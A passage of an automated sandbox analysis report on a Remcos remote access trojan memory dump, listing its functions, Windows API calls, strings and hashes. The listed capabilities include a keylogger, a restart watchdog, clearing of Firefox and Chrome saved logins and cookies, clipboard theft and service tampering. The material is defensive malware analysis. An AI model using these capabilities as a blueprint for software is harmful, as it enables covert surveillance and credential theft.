                                        • Instruction ID: f1c9d9c8be49086b0da658a17e2e71725cc59a9ae6dc0ffb4f6ef05804e3c654
                                        • Opcode Fuzzy Hash: 9dc11bf39052f30d52db135ed2d5382c339bb7d9e39e7e9d517b85ce13748cf4
                                        • Instruction Fuzzy Hash: 1891F971A11204BFFF04FFA5AD64D6E7BADFB64248F40042DFD469B281DA25BC058B61
                                        Function 04A90B5C Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 04A90B6B
                                          • Part of subcall function 04A92268: RegCreateKeyA.ADVAPI32(80000001,00000000,04AE3050), ref: 04A92276
                                          • Part of subcall function 04A92268: RegSetValueExA.ADVAPI32(04AE3050,000000AF,00000000,00000004,00000001,00000004,?,?,?,04A8B093,04AE38E0,00000001,000000AF,04AE3050), ref: 04A92291
                                          • Part of subcall function 04A92268: RegCloseKey.ADVAPI32(04AE3050,?,?,?,04A8B093,04AE38E0,00000001,000000AF,04AE3050), ref: 04A9229C
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 04A90BAB
                                        • CloseHandle.KERNEL32(00000000), ref: 04A90BBA
                                        • CreateThread.KERNEL32(00000000,00000000,04A91253,00000000,00000000,00000000), ref: 04A90C10
                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 04A90E7F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                        • API String ID: 3018269243-13974260
                                        • Opcode ID: 039d3506c871f7b204437c1256075ceb70faeaab04d406b279ed1bb159db2679
                                        • Instruction ID: 9cd41854f8ce017363c10cc2c7b97bde7a3e8bbd0c21c7dfabbf922362c6a399
                                        • Opcode Fuzzy Hash: 039d3506c871f7b204437c1256075ceb70faeaab04d406b279ed1bb159db2679
                                        • Instruction Fuzzy Hash: C971C6726083016BFA08FB71CE55DBF77E8EFA1208F40092DF45256191EF64BE0AC692
                                        Function 04A8AA71 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 04A8AAF0
                                        • FindClose.KERNEL32(00000000), ref: 04A8AB0A
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 04A8AC2D
                                        • FindClose.KERNEL32(00000000), ref: 04A8AC53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                        • API String ID: 1164774033-3681987949
                                        • Opcode ID: 75ef2b917be17a7087d710d43eaea8378eba315f1c26d7d274f1754f081509c9
                                        • Instruction ID: 5dbb4cc47aaa5c8408cb1669b5d58994116490a1bec2447aa82231c52ed01db6
                                        • Opcode Fuzzy Hash: 75ef2b917be17a7087d710d43eaea8378eba315f1c26d7d274f1754f081509c9
                                        • Instruction Fuzzy Hash: 60513971900119ABEB14FBB0DE95AEEB778FF60208F40065EE416A60D1FF747E46CA91
                                        Function 04A8AC78 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 04A8ACF0
                                        • FindClose.KERNEL32(00000000), ref: 04A8AD0A
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 04A8ADCA
                                        • FindClose.KERNEL32(00000000), ref: 04A8ADF0
                                        • FindClose.KERNEL32(00000000), ref: 04A8AE11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$File$FirstNext
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 3527384056-432212279
                                        • Opcode ID: afbc07ee94dc55de29737b8265fc2946ce16348eb2e6c3375388058535cb7faa
                                        • Instruction ID: dbd9f6267a9c4e7c3902c4a226f6ac573d7215c68fbf89995bcc59ae7ea0ce63
                                        • Opcode Fuzzy Hash: afbc07ee94dc55de29737b8265fc2946ce16348eb2e6c3375388058535cb7faa
                                        • Instruction Fuzzy Hash: 77416C71A01219ABEF14FBB0DD55AEEB778EF11218F80055EE402A71C1FF647E86CA91
                                        Function 04A9A01B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 106fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A076
                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0A6
                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A118
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A125
                                          • Part of subcall function 04A9A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A0FB
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A146
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A15C
                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A163
                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,04AF2200,00000001), ref: 04A9A16C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                        • String ID: 05#v`#v$pth_unenc
                                        • API String ID: 2341273852-1557463602
                                        • Opcode ID: 3474a3e9f063ab655633c88f77b698be669cab0ffb685ac142d0bff5dbc351be
                                        • Instruction ID: f7d9f650dda6a6ec1385afb6ffe4a371b768d806b5f7f765214f6fbd073c654c
                                        • Opcode Fuzzy Hash: 3474a3e9f063ab655633c88f77b698be669cab0ffb685ac142d0bff5dbc351be
                                        • Instruction Fuzzy Hash: 5F31A77190621C6ADF20EBA0EC48EDB77FCEF14204F5406A6E555D2051EB35AEC58B60
                                        Function 04A94EC1 Relevance: 18.1, APIs: 12, Instructions: 83clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenClipboard.USER32 ref: 04A94EC2
                                        • EmptyClipboard.USER32 ref: 04A94ED0
                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 04A94EF0
                                        • GlobalLock.KERNEL32(00000000), ref: 04A94EF9
                                        • GlobalUnlock.KERNEL32(00000000), ref: 04A94F2F
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 04A94F38
                                        • CloseClipboard.USER32 ref: 04A94F55
                                        • OpenClipboard.USER32 ref: 04A94F5C
                                        • GetClipboardData.USER32(0000000D), ref: 04A94F6C
                                        • GlobalLock.KERNEL32(00000000), ref: 04A94F75
                                        • GlobalUnlock.KERNEL32(00000000), ref: 04A94F7E
                                        • CloseClipboard.USER32 ref: 04A94F84
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                        • String ID:
                                        • API String ID: 3520204547-0
                                        • Opcode ID: a59d9e9b64f8adc78932f9eec87928694bb3d29629e561ea007e4e6c7d31b258
                                        • Instruction ID: cdccffc1678ec148341d9d7ca1811a999eb8405098d66432d2af6d207314b033
                                        • Opcode Fuzzy Hash: a59d9e9b64f8adc78932f9eec87928694bb3d29629e561ea007e4e6c7d31b258
                                        • Instruction Fuzzy Hash: 412186726052009BE714BBB0DD59ABF77F8EFA4605F44081EF54782181EF38AC0BCA62
                                        Function 04A975E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0$1$2$3$4$5$6$7
                                        • API String ID: 0-3177665633
                                        • Opcode ID: a7618f23893a7341128b06d42b6ca415c45b62da74cceee85112358df2b69ba3
                                        • Instruction ID: a6d89101173e88cd682a7b4376fdb07c6aff237b01c481ea3452d418373d5696
                                        • Opcode Fuzzy Hash: a7618f23893a7341128b06d42b6ca415c45b62da74cceee85112358df2b69ba3
                                        • Instruction Fuzzy Hash: 9461A474919301AEEB04FF20D9A0FAA77E4DF85714F00490DF992572D0EA70BE89D7A2
                                        Function 04A986FE Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,04AF27F8), ref: 04A98714
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 04A98763
                                        • GetLastError.KERNEL32 ref: 04A98771
                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 04A987A9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                        • String ID:
                                        • API String ID: 3587775597-0
                                        • Opcode ID: 8417885e5e469ab238b0615e520e330d82f472111db7ad933c07a4f93bdf3b1b
                                        • Instruction ID: 8d0bcc6a6a3c3697cd47254f9308f87daf86e42dd80ee5c7dddf2b75086f7251
                                        • Opcode Fuzzy Hash: 8417885e5e469ab238b0615e520e330d82f472111db7ad933c07a4f93bdf3b1b
                                        • Instruction Fuzzy Hash: 4D813AB1108344ABE704FB61D980DAFB7ECFFA4608F50491EF59646150EF74BA0ACB92
                                        Function 04A98AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98AD2
                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98AE9
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98AF6
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98B05
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98B16
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A9843C,00000000), ref: 04A98B19
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: da1a035498c94c56d6e20f6bbd15a8882673504619749515051872513fcf5bb4
                                        • Instruction ID: 8a72cf39657eece5a9d935c5d6e4e82e368f831331aa5ddc268f41893d0d9826
                                        • Opcode Fuzzy Hash: da1a035498c94c56d6e20f6bbd15a8882673504619749515051872513fcf5bb4
                                        • Instruction Fuzzy Hash: 5011E572A021186FAB10BB64DC89CBF3BBCDF566907004019FA06D2140DB6C6D079AB1
                                        Function 04A8B28E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 04A8B2DC
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 04A8B3AF
                                        • FindClose.KERNEL32(00000000), ref: 04A8B3BE
                                        • FindClose.KERNEL32(00000000), ref: 04A8B3E9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext
                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 1164774033-405221262
                                        • Opcode ID: cac7b49a9ddf34aee8270c0d7ce1790e5c85c8153348c750c1e2bbe772793d32
                                        • Instruction ID: fc74be7c3c5aa6f22f6d3dc28f1bc20fe0e8e872e7368aa2410eae9e134eb7df
                                        • Opcode Fuzzy Hash: cac7b49a9ddf34aee8270c0d7ce1790e5c85c8153348c750c1e2bbe772793d32
                                        • Instruction Fuzzy Hash: 98319C71A00219ABEB14FBA0DE95DFE777CEF10718F00005EE416A2091EF74BA8ACB50
                                        Function 04A89340 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 04A8935B
                                        • SetWindowsHookExA.USER32(0000000D,04A8932C,00000000), ref: 04A89369
                                        • GetLastError.KERNEL32 ref: 04A89375
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 04A893C3
                                        • TranslateMessage.USER32(?), ref: 04A893D2
                                        • DispatchMessageA.USER32(?), ref: 04A893DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                        • String ID: Keylogger initialization failure: error $`#v
                                        • API String ID: 3219506041-3226811161
                                        • Opcode ID: 679844e78df2bc01bab967c170e5141a49568c15deca19d2cf6f9628edcaca1b
                                        • Instruction ID: 5d793a0f31ab4054b67f87ca793f0c00d76596c9b226a52b5e47c0ed56f10bc9
                                        • Opcode Fuzzy Hash: 679844e78df2bc01bab967c170e5141a49568c15deca19d2cf6f9628edcaca1b
                                        • Instruction Fuzzy Hash: 7A11A372A05201BBD7107BB59D098BB7BFCEBD5615B100A6DF8A2C2180EF34E902C7A1
                                        Function 04A928E3 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 485registrylibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 04A929B8
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 04A929C4
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 04A92CBA
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A92CC1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                        • API String ID: 2127411465-314212984
                                        • Opcode ID: 5616818d4a274ceea3df833dfceea57ae76bd65840899a1ed6d13ef59384d331
                                        • Instruction ID: a7d25079b819e33bcec574abedf2a40604f867a46648534a58d0bf46c5b69072
                                        • Opcode Fuzzy Hash: 5616818d4a274ceea3df833dfceea57ae76bd65840899a1ed6d13ef59384d331
                                        • Instruction Fuzzy Hash: A6E1D273A042007BFE18B7749E65EBE76E8EF91208F400A5DF542A71D1EE25BE058292
                                        Function 04AC66BF Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 04AC6741
                                        • _free.LIBCMT ref: 04AC6765
                                        • _free.LIBCMT ref: 04AC68EC
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,04ADC1E4), ref: 04AC68FE
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF754,000000FF,00000000,0000003F,00000000,?,?), ref: 04AC6976
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF7A8,000000FF,?,0000003F,00000000,?), ref: 04AC69A3
                                        • _free.LIBCMT ref: 04AC6AB8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: a30ef47bc675234238153e3270c647f12b101c9f33c8d977e3924baee5d529dd
                                        • Instruction ID: 57192379a2da2e6ebb482f5c4dd0f158668cfe475ecba34151550599f47df8c3
                                        • Opcode Fuzzy Hash: a30ef47bc675234238153e3270c647f12b101c9f33c8d977e3924baee5d529dd
                                        • Instruction Fuzzy Hash: B7C139B1A00245AFEB60DF79C944BAE7BFCEF45314F18456ED4949B240E735AE42CB90
                                        Function 04A8A953 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 04A8A98F
                                        • GetLastError.KERNEL32 ref: 04A8A999
                                        Strings
                                        • [Chrome StoredLogins found, cleared!], xrefs: 04A8A9BF
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 04A8A95A
                                        • [Chrome StoredLogins not found], xrefs: 04A8A9B3
                                        • UserProfile, xrefs: 04A8A95F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteErrorFileLast
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 2018770650-1062637481
                                        • Opcode ID: 1997564d7124b7e638ab511f68f20007c441a8a1c73709f61bdb4b04e35e374c
                                        • Instruction ID: 6d14481eaa103b5f43e1e5303169747e9e6482819ea20c3143d24f50ea37a8cd
                                        • Opcode Fuzzy Hash: 1997564d7124b7e638ab511f68f20007c441a8a1c73709f61bdb4b04e35e374c
                                        • Instruction Fuzzy Hash: AD01D632A85104BB6B047BB5DD568BF7B28FB11604F80011FE41257291FE127D06CBD2
                                        Function 04A95C90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 04A95C9D
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 04A95CA4
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04A95CB6
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04A95CD5
                                        • GetLastError.KERNEL32 ref: 04A95CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: 1183b2c5735c0608096ae3865af14481e92f31d9f1a158840e156d234e7d6dea
                                        • Instruction ID: e178dae50807cc7932b1207e8b2ec61c02991ab0317b852e571d31c05ac6ea44
                                        • Opcode Fuzzy Hash: 1183b2c5735c0608096ae3865af14481e92f31d9f1a158840e156d234e7d6dea
                                        • Instruction Fuzzy Hash: E4F0D4B5902129BBEB10ABA1ED4DEEFBFBCEF19215F108054F906A2140D6795E05CAB1
                                        Function 04A8838E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 04A88393
                                          • Part of subcall function 04A848A8: connect.WS2_32(?,?,?), ref: 04A848C0
                                          • Part of subcall function 04A84A81: send.WS2_32(?,00000000,00000000,00000000), ref: 04A84B16
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8842F
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 04A8848D
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 04A884E5
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 04A884FC
                                          • Part of subcall function 04A84E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,04AF1E90,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E18
                                          • Part of subcall function 04A84E06: SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E23
                                          • Part of subcall function 04A84E06: CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000,04AF1E90,04A84AA9), ref: 04A84E2C
                                        • FindClose.KERNEL32(00000000), ref: 04A886F4
                                          • Part of subcall function 04A84A81: WaitForSingleObject.KERNEL32(?,00000000,04A845C6,?,?,00000004,?,?,00000004,04A8BE60,00000000,?), ref: 04A84B27
                                          • Part of subcall function 04A84A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,04A8BE60,00000000,?,?,?,?,?,?,04A845C6), ref: 04A84B55
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                        • String ID:
                                        • API String ID: 1824512719-0
                                        • Opcode ID: 170618353813f56010490296eb28ce374e6a0aaf5f192d692dbffca4c577df30
                                        • Instruction ID: ad455328c55436daa47c89347bd190c60d1bc1a4ff297795477dea31d588a03a
                                        • Opcode Fuzzy Hash: 170618353813f56010490296eb28ce374e6a0aaf5f192d692dbffca4c577df30
                                        • Instruction Fuzzy Hash: B6B18B72900109ABEB14FBA0DE91EEDB778EF14314F5042ADE516AB191EF347E49CB90
                                        Function 04A90763 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A90201: SetLastError.KERNEL32(0000000D,04A90781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A9075F), ref: 04A90207
                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A9075F), ref: 04A9079C
                                        • GetNativeSystemInfo.KERNEL32(?,04A8BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04A9075F), ref: 04A9080A
                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 04A9082E
                                          • Part of subcall function 04A90708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,04A9084C,?,00000000,00003000,00000004,00000000,?,?), ref: 04A90718
                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 04A90875
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 04A9087C
                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A9098F
                                          • Part of subcall function 04A90ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,04A9099C,?,?,?,?,?), ref: 04A90B4C
                                          • Part of subcall function 04A90ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04A90B53
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                        • String ID:
                                        • API String ID: 3950776272-0
                                        • Opcode ID: 9b29e614a0546e2cb480fc0cd60e78c148e013d0b776dbe89ab6301b35e0bfa3
                                        • Instruction ID: 2e79055c62e76e10a08728355d079380f3afd6de7384e0f9cca6b87f6271765e
                                        • Opcode Fuzzy Hash: 9b29e614a0546e2cb480fc0cd60e78c148e013d0b776dbe89ab6301b35e0bfa3
                                        • Instruction Fuzzy Hash: 0E61D4B1309611ABEF509F25CD80B2A7BE9FF457A4F044118EA468B681EB74FC41CBD1
                                        Function 04A98C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,04A98344,00000000), ref: 04A98C3E
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,04A98344,00000000), ref: 04A98C52
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,04A98344,00000000), ref: 04A98C5F
                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,04A98344,00000000), ref: 04A98C94
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,04A98344,00000000), ref: 04A98CA6
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,04A98344,00000000), ref: 04A98CA9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                        • String ID:
                                        • API String ID: 493672254-0
                                        • Opcode ID: c97756dd63db49bbcce76d003db89eba72b45d1bd9bc8ea281edfc0f7b53bd7a
                                        • Instruction ID: c026ebe89b1fb40120ed72fee41d6b852a4d676022e4adaaebd610c864ab558e
                                        • Opcode Fuzzy Hash: c97756dd63db49bbcce76d003db89eba72b45d1bd9bc8ea281edfc0f7b53bd7a
                                        • Instruction Fuzzy Hash: E901F5711961147AEA106B789D4EE7B3AECDB43270F04431DF527E61C0DA6CAE0A91A1
                                        Function 04A89468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                        Download Yara Rule
                                        APIs
